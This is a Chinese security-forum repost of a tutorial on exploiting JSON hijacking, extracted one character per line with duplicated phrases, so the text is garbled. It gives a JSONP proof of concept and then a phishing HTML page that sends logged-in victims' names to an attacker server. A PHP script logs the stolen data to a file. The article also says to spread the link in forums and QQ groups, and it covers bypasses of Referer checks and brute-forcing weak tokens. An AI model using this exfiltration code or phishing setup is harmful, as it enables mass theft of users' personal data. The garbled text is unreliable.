论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
云安全
[13708] 2019-01-28_小学生都会挖掘的JSONHijacking实战利用
文档创建者:
s7ckTeam
浏览次数:
2
最后更新:
2025-01-18
云安全
2 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-54
6万
主题
-6万
回帖
-54
积分
管理员
积分
-54
发消息
2019-01-28_小学生都会挖掘的JSONHijacking实战利用
小
学
生
都
会
挖
掘
的
J
S
O
N
H
i
j
a
c
k
i
n
g
实
战
利
用
z
h
u
k
a
i
a
n
g
7
F
r
e
e
B
u
f
2
0
1
9
-
0
1
-
2
8
前
言
前
言
J
S
O
N
H
i
j
a
c
k
i
n
g
漏
洞
的
详
细
利
用
,
有
点
类
似
与
漏
洞
的
详
细
利
用
,
有
点
类
似
与
C
S
R
F
,
不
过
原
理
利
用
方
式
不
同
,
在
这
边
文
章
我
着
重
讲
解
,
不
过
原
理
利
用
方
式
不
同
,
在
这
边
文
章
我
着
重
讲
解
j
s
o
n
跨
跨
域
劫
持
的
利
用
环
境
搭
建
与
方
式
。
域
劫
持
的
利
用
环
境
搭
建
与
方
式
。
0
×
0
1
漏
洞
的
挖
掘
漏
洞
的
挖
掘
一
般
挖
掘
的
过
程
中
,
b
u
r
p
s
u
i
t
e
代
理
的
H
i
s
t
o
r
y
做
寻
找
,
过
滤
多
余
不
可
能
存
在
漏
洞
的
一
些
链
接
,
如
下
图
所
示
:
我
们
在
返
回
包
中
j
s
o
n
格
式
发
现
了
如
下
的
敏
感
信
息
(
用
户
I
d
,
用
户
名
,
用
户
手
机
号
码
)
。
0
×
0
2
漏
洞
的
证
明
之
漏
洞
的
证
明
之
p
o
c
提
交
漏
洞
,
p
o
c
在
众
测
时
要
争
分
夺
秒
,
所
以
这
边
用
了
最
精
简
的
一
个
P
O
C
。
假
如
返
回
的
数
据
为
:
t
x
f
(
{
"
d
a
t
a
"
:
{
"
n
a
m
e
"
:
"
唐
晓
峰
"
}
}
)
;
即
可
如
下
弹
窗
:
<
h
t
m
l
>
<
h
e
a
d
>
<
s
c
r
i
p
t
>
f
u
n
c
t
i
o
n
t
x
f
(
a
)
{
a
l
e
r
t
(
a
.
d
a
t
a
.
n
a
m
e
)
;
}
<
/
s
c
r
i
p
t
>
<
s
c
r
i
p
t
s
r
c
=
h
t
t
p
:
/
/
*
*
*
.
*
*
*
.
*
*
/
w
m
/
U
s
e
r
/
g
e
t
U
s
e
r
I
n
f
o
?
c
a
l
l
b
a
c
k
=
t
x
f
>
<
/
s
c
r
i
p
t
>
<
/
b
o
d
y
>
<
/
h
t
m
l
>
0
×
0
3
漏
洞
的
利
用
之
钓
鱼
漏
洞
的
利
用
之
钓
鱼
1
.
准
备
一
台
w
e
b
服
务
器
,
我
直
接
p
h
p
s
t
u
d
y
搭
的
。
附
上
服
务
器
端
的
代
码
把
钓
鱼
链
接
h
t
t
p
:
/
/
.
.
*
*
*
/
钓
鱼
.
h
t
m
l
发
给
该
网
站
已
登
陆
的
用
户
,
如
论
坛
,
社
区
Q
Q
群
,
社
区
贴
吧
等
,
服
务
端
即
可
获
取
到
大
量
用
户
敏
感
数
据
。
这
边
以
这
边
以
h
a
c
k
o
n
e
的
一
个
项
目
为
例
:
的
一
个
项
目
为
例
:
0
×
0
4
漏
洞
的
修
复
与
绕
过
漏
洞
的
修
复
与
绕
过
因
为
这
个
例
子
是
小
伙
伴
发
过
来
的
还
没
修
复
,
所
以
都
脱
敏
了
,
我
们
再
从
开
发
修
复
的
角
度
去
思
考
如
何
绕
过
修
复
。
1
.
R
e
f
e
r
e
r
白
名
单
子
域
名
绕
过
,
文
件
名
绕
过
,
空
R
e
f
e
r
e
r
绕
过
j
s
o
n
.
p
h
p
<
?
p
h
p
$
n
i
c
k
n
a
m
e
=
$
_
G
E
T
[
'
n
a
m
e
'
]
;
$
f
p
=
f
o
p
e
n
(
'
i
n
f
o
.
t
x
t
'
,
'
a
'
)
;
$
f
l
a
g
=
f
w
r
i
t
e
(
$
f
p
,
"
名
字
:
"
.
$
n
a
m
e
.
"
r
n
"
)
;
?
>
<
h
t
m
l
>
钓
鱼
.
h
t
m
l
<
h
e
a
d
>
<
t
i
t
l
e
>
t
x
f
<
/
t
i
t
l
e
>
<
s
c
r
i
p
t
>
v
a
r
x
m
l
h
t
t
p
;
f
u
n
c
t
i
o
n
t
x
f
(
a
)
{
x
m
l
h
t
t
p
=
n
e
w
X
M
L
H
t
t
p
R
e
q
u
e
s
t
(
)
v
a
r
x
=
"
h
t
t
p
:
/
/
*
*
*
.
*
*
*
.
*
*
*
/
j
s
o
n
.
p
h
p
?
n
a
m
e
=
"
+
a
.
d
a
t
a
.
n
a
m
e
;
x
m
l
h
t
t
p
.
o
p
e
n
(
"
G
E
T
"
,
x
,
t
r
u
e
)
;
x
m
l
h
t
t
p
.
s
e
n
d
(
)
;
}
<
/
s
c
r
i
p
t
>
>
<
s
c
r
i
p
t
s
r
c
=
h
t
t
p
:
/
/
*
*
*
.
*
*
*
.
*
*
*
?
c
a
l
l
b
a
c
k
=
t
x
f
>
<
/
s
c
r
i
p
t
>
<
/
h
e
a
d
>
<
b
o
d
y
>
<
t
e
x
t
a
r
e
a
>
钓
鱼
啦
,
傻
瓜
<
/
t
e
x
t
a
r
e
a
>
>
<
/
b
o
d
y
>
<
/
h
t
m
l
>
2
.
增
加
t
o
k
e
n
认
证
t
o
k
e
n
足
够
复
杂
或
者
服
务
端
加
密
,
我
们
无
法
绕
过
,
如
果
t
o
k
e
n
很
简
单
,
如
纯
数
字
,
我
们
可
以
尝
试
遍
历
绕
过
3
.
接
口
禁
用
无
敌
的
操
作
,
无
法
绕
过
总
结
:
总
结
:
非
常
有
意
思
的
一
个
劫
持
,
以
前
没
有
利
用
过
,
只
是
知
道
有
这
么
个
东
西
,
一
般
众
测
或
者
项
目
上
遇
到
我
都
是
直
接
截
图
,
申
明
一
波
敏
感
信
息
泄
露
,
然
后
就
结
束
了
,
很
低
危
,
这
次
实
战
利
用
之
后
,
稍
微
提
高
了
一
点
逼
格
。
*
本
文
作
者
:
本
文
作
者
:
z
h
u
k
a
i
a
n
g
7
,
转
载
请
注
明
来
自
,
转
载
请
注
明
来
自
F
r
e
e
B
u
f
.
C
O
M
阅
读
原
文
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页